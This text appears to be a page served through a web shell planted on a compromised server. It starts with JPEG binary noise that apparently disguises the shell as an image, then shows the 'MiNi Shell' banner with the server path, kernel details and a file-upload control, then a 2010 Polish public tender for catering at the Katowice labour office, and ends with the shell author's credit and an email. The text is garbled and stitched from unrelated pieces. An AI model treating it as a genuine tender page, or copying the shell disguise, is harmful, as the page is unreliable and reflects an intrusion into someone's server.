JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20101001/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20101001/271637-N-2010.html

<p class="kh_header"><b>Katowice: Usługa cateringowa</b><br>
<b>Numer ogłoszenia: 271637 - 2010; data zamieszczenia: 01.10.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzki Urząd Pracy , ul. Kościuszki 30, 40-048 Katowice, woj. śląskie, tel. 0 32 757 33 61.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wup-katowice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka samorządu terytorialnego nieposiadająca osobowości prawnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługa cateringowa.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Część I 
Przedmiotem zamówienia jest zapewnienie usługi cateringowej w trakcie spotkania dla przedstawicieli Gminnych Centrów Informacji w dniu 26 października 2010r. Na spotkaniu przewiduje się udział 30 osób.
Usługa cateringowa powinna obejmować: 
1) Napoje:
a) gorąca kawa rozpuszczalna i herbata podana w termosach, 
b) dodatki: cukier, mleko, cytryna,
c) woda mineralna - 1 butelka na osobę,
- woda mineralna gazowana (10 butelek plastikowych o pojemności 500 ml),
- woda mineralna niegazowana (20 butelek plastikowych o pojemności 500 ml),
d) soki (3 rodzaje, podane w szklanych dzbankach) - 250 ml na osobę,
2) Wyroby cukiernicze różnorodne:
a) mieszanka kruchych ciasteczek (co najmniej 3 rodzaje) w ilości nie mniejszej niż 30 g na osobę z każdego rodzaju,
b) ciasta domowego wypieku - 2 sztuki na osobę:
- co najmniej 3 rodzaje ciast: szarlotka, sernik, makowiec (60 sztuk),
3) Kanapki bankietowe na jasnym i ciemnym pieczywie - 120 sztuk
- z serem białym na ostro i ziołami (20 sztuk),
- z szynką, pomidorem i bazylią (30 sztuk),
- z łososiem, cytryną i koperkiem (30 sztuk),
- z jajkiem, pomidorem, papryką i pietruszką (20 sztuk),
- z salami, czerwoną papryką i czarnymi oliwkami (20 sztuk),

Wykonawca jest zobowiązany zapewnić również:
- zastawę białą porcelanową lub ceramiczną, sztućce trwałe - w odpowiedniej ilości,
- dekorację stołu - obrusy materiałowe i serwetki jednorazowe,
- transport,
Catering powinien zostać dostarczony do siedziby Wojewódzkiego Urzędu Pracy w Katowicach, ul. Kościuszki 30, II piętro, sala 221 na godzinę 08:00.

Część II 
Przedmiotem zamówienia jest zapewnienie usługi cateringowej w dniu 18 listopada 2010r.  w trakcie konferencji dla przedstawicieli instytucji rynku pracy, pomocy społecznej oraz organizacji pozarządowych zajmujących się tematyką wykluczenia społecznego oraz zaproszonych prelegentów (Ministerstwo Pracy i Polityki Społecznej, Regionalny Ośrodek Polityki Społecznej oraz przedstawiciele PUP, MOPR). Na spotkaniu przewiduje się udział 200 osób.

Konferencja odbędzie się w dniu 18 listopada 2010 r. na terenie Katowic.
Usługa cateringowa powinna obejmować: 
1)     Napoje: 

     a)     gorąca kawa rozpuszczalna i herbata podana w termosach - bez ograniczeń,
     b)    dodatki: cukier, mleko, cytryna - bez ograniczeń,
     c)     woda mineralna - 1 butelka na osobę: 
             woda mineralna gazowana (100 butelek plastikowych o pojemności 500 ml),
             woda mineralna niegazowana (100 butelek plastikowych o pojemności 500   ml),  
      d)    soki (3 rodzaje, podane w szklanych dzbankach) - 200 ml na osobę,      
2)     Wyroby cukiernicze różnorodne:  
a)     mieszanka kruchych ciasteczek (co najmniej 3 rodzaje)  w ilości nie mniejszej niż 30 g na osobę
      z każdego rodzaju, 
b)    ciasta domowego wypieku :
     - co najmniej 2 rodzaje ciast: szarlotka, sernik (200 sztuk),
     - Babeczki owocowe (100 sztuk), 
     - Rogaliki drożdżowe z nadzieniem (100 sztuk).
3)     Kanapki bankietowe na jasnym i ciemnym pieczywie -2 sztuki na osobę:

      - z pastą jajeczną, papryką czerwoną i szczypiorkiem  (55 sztuk),
      - z jajkiem, pomidorem, papryką i pietruszką (60 sztuk) ,
      - z szynką pieczoną i ogórkiem konserwowym  (60 sztuk),
      - z serem białym na ostro i ziołami (55 sztuk) ,
      - z salami, czerwoną papryką i czarnymi oliwkami (55 sztuk) ,
      - z szynką, pomidorem, serem mozzarella i bazylią (60 sztuk),
      - z łososiem, cytryną i koperkiem (55 sztuk).
4)   Świeże owoce podawane na paterach:
     - jabłka - 2 kg,
     - banany - 1,5 kg,
     - winogrona (zielone, czarne) - 3 kg,
     - pomarańcze - 1,5 kg,
     - mandarynki - 2 kg,
5)     Ciepły posiłek podany w podgrzewaczach:  

- bogracz lub strogonow lub równoważne danie firmowe - 200 ml na osobę,
- pieczywo mieszane (jasne, ciemne) -  40 g na osobę.
Wykonawca jest zobowiązany zapewnić również:
     - zastawę białą porcelanową lub ceramiczną, sztućce trwałe - w odpowiedniej ilości,  
     - dekorację stołu - obrusy materiałowe i dopasowane serwetki papierowe (jednorazowe),
     - obsługę kelnerską przez cały czas trwania wydarzenia (w godz. 9:00 - 14:00),
     - transport.
Catering powinien zostać dostarczony do Auli Nr 2 mieszczącej się w Budynku Wydziału Prawa i Administracji Uniwersytetu Śląskiego w Katowicach przy ul. Bankowej 11 b. 
Uwagi ogólne:
Kawa, herbata wraz z wyrobami cukierniczymi oraz owocami powinny zostać dostarczone -  na godzinę 9.00, natomiast ciepły posiłek i kanapki bankietowe powinny zostać dostarczone - na godzinę 13.00. 
W konferencji przewiduje się udział 200 osób. Płatność za usługę nastąpi po jej zrealizowaniu, przy czym koszt będzie uzależniony od liczby uczestników konferencji podanej nie później niż na trzy dni kalendarzowe przed planowanym terminem konferencji..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 55.52.00.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 26.10.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie przewiduje wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy wykażą, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie zrealizowali co najmniej 3 usługi odpowiadające swoim rodzajem i zakresem przedmiotowi zamówienia.

		  Opis sposobu dokonywania oceny spełnienia tego warunku:
Zamawiający dokona oceny spełnienia w/w warunku według formuły spełnia nie spełnia na podstawie załączonego do oferty wykazu, przy czym wykaz ten zawierać będzie zamówienia  wykonane w okresie ostatnich trzech lat przed upływem terminu składania ofert, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie z podaniem dat wykonania
i odbiorców wraz z załączeniem dokumentów potwierdzających, że te usługi zostały wykonane lub są wykonywane należycie (np. referencje).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Pełnomocnictwo, w sytuacjach, w których uprawnienie do występowania w imieniu Wykonawcy nie wynika z przedłożonego dokumentu wyszczególnionego w punkcie III.4.2. W przypadku złożenia kopii pełnomocnictwo musi być potwierdzone za zgodność z oryginałem przez Wykonawcę lub osobę upoważnioną.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://wup.katowice.ibip.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wojewódzki Urząd Pracy w Katowicach,  ul. Kościuszki 30 , pok. 304-305, III piętro..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.10.2010 godzina 10:00, miejsce: Wojewódzki Urząd Pracy 
w Katowicach,  ul. Kościuszki 30 , pok. 352 - Kancelaria Urzędu, III piętro..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Część I 
Przedmiotem zamówienia jest zapewnienie usługi cateringowej w trakcie spotkania dla przedstawicieli Gminnych Centrów Informacji w dniu 26 października 2010r. Na spotkaniu przewiduje się udział 30 osób..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Usługa cateringowa powinna obejmować: 
1) Napoje:
a) gorąca kawa rozpuszczalna i herbata podana w termosach, 
b) dodatki: cukier, mleko, cytryna,
c) woda mineralna - 1 butelka na osobę,
- woda mineralna gazowana (10 butelek plastikowych o pojemności 500 ml),
- woda mineralna niegazowana (20 butelek plastikowych o pojemności 500 ml),
d) soki (3 rodzaje, podane w szklanych dzbankach) - 250 ml na osobę,
2) Wyroby cukiernicze różnorodne:
a) mieszanka kruchych ciasteczek (co najmniej 3 rodzaje) w ilości nie mniejszej niż 30 g na osobę z każdego rodzaju,
b) ciasta domowego wypieku - 2 sztuki na osobę:
- co najmniej 3 rodzaje ciast: szarlotka, sernik, makowiec (60 sztuk),
3) Kanapki bankietowe na jasnym i ciemnym pieczywie - 120 sztuk
- z serem białym na ostro i ziołami (20 sztuk),
- z szynką, pomidorem i bazylią (30 sztuk),
- z łososiem, cytryną i koperkiem (30 sztuk),
- z jajkiem, pomidorem, papryką i pietruszką (20 sztuk),
- z salami, czerwoną papryką i czarnymi oliwkami (20 sztuk),

Wykonawca jest zobowiązany zapewnić również:
- zastawę białą porcelanową lub ceramiczną, sztućce trwałe - w odpowiedniej ilości,
- dekorację stołu - obrusy materiałowe i serwetki jednorazowe,
- transport,
Catering powinien zostać dostarczony do siedziby Wojewódzkiego Urzędu Pracy w Katowicach, ul. Kościuszki 30, II piętro, sala 221 na godzinę 08:00..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.52.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 26.10.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Część II 
Przedmiotem zamówienia jest zapewnienie usługi cateringowej w dniu 18 listopada 2010r.  w trakcie konferencji dla przedstawicieli instytucji rynku pracy, pomocy społecznej oraz organizacji pozarządowych zajmujących się tematyką wykluczenia społecznego oraz zaproszonych prelegentów (Ministerstwo Pracy i Polityki Społecznej, Regionalny Ośrodek Polityki Społecznej oraz przedstawiciele PUP, MOPR). Na spotkaniu przewiduje się udział 200 osób..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Konferencja odbędzie się w dniu 18 listopada 2010 r. na terenie Katowic.
Usługa cateringowa powinna obejmować: 
1)     Napoje: 

     a)     gorąca kawa rozpuszczalna i herbata podana w termosach - bez ograniczeń,
     b)    dodatki: cukier, mleko, cytryna - bez ograniczeń,
     c)     woda mineralna - 1 butelka na osobę: 
             woda mineralna gazowana (100 butelek plastikowych o pojemności 500 ml),
             woda mineralna niegazowana (100 butelek plastikowych o pojemności 500   ml),  
      d)    soki (3 rodzaje, podane w szklanych dzbankach) - 200 ml na osobę,      
2)     Wyroby cukiernicze różnorodne:  
a)     mieszanka kruchych ciasteczek (co najmniej 3 rodzaje)  w ilości nie mniejszej niż 30 g na osobę
      z każdego rodzaju, 
b)    ciasta domowego wypieku :
     - co najmniej 2 rodzaje ciast: szarlotka, sernik (200 sztuk),
     - Babeczki owocowe (100 sztuk), 
     - Rogaliki drożdżowe z nadzieniem (100 sztuk).
3)     Kanapki bankietowe na jasnym i ciemnym pieczywie -2 sztuki na osobę:

      - z pastą jajeczną, papryką czerwoną i szczypiorkiem  (55 sztuk),
      - z jajkiem, pomidorem, papryką i pietruszką (60 sztuk) ,
      - z szynką pieczoną i ogórkiem konserwowym  (60 sztuk),
      - z serem białym na ostro i ziołami (55 sztuk) ,
      - z salami, czerwoną papryką i czarnymi oliwkami (55 sztuk) ,
      - z szynką, pomidorem, serem mozzarella i bazylią (60 sztuk),
      - z łososiem, cytryną i koperkiem (55 sztuk).
4)   Świeże owoce podawane na paterach:
     - jabłka - 2 kg,
     - banany - 1,5 kg,
     - winogrona (zielone, czarne) - 3 kg,
     - pomarańcze - 1,5 kg,
     - mandarynki - 2 kg,
5)     Ciepły posiłek podany w podgrzewaczach:  

- bogracz lub strogonow lub równoważne danie firmowe - 200 ml na osobę,
- pieczywo mieszane (jasne, ciemne) -  40 g na osobę.
Wykonawca jest zobowiązany zapewnić również:
     - zastawę białą porcelanową lub ceramiczną, sztućce trwałe - w odpowiedniej ilości,  
     - dekorację stołu - obrusy materiałowe i dopasowane serwetki papierowe (jednorazowe),
     - obsługę kelnerską przez cały czas trwania wydarzenia (w godz. 9:00 - 14:00),
     - transport.
Catering powinien zostać dostarczony do Auli Nr 2 mieszczącej się w Budynku Wydziału Prawa i Administracji Uniwersytetu Śląskiego w Katowicach przy ul. Bankowej 11 b. 
Uwagi ogólne:
Kawa, herbata wraz z wyrobami cukierniczymi oraz owocami powinny zostać dostarczone -  na godzinę 9.00, natomiast ciepły posiłek i kanapki bankietowe powinny zostać dostarczone - na godzinę 13.00. 
W konferencji przewiduje się udział 200 osób. Płatność za usługę nastąpi po jej zrealizowaniu, przy czym koszt będzie uzależniony od liczby uczestników konferencji podanej nie później niż na trzy dni kalendarzowe przed planowanym terminem konferencji..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.52.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 18.11.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com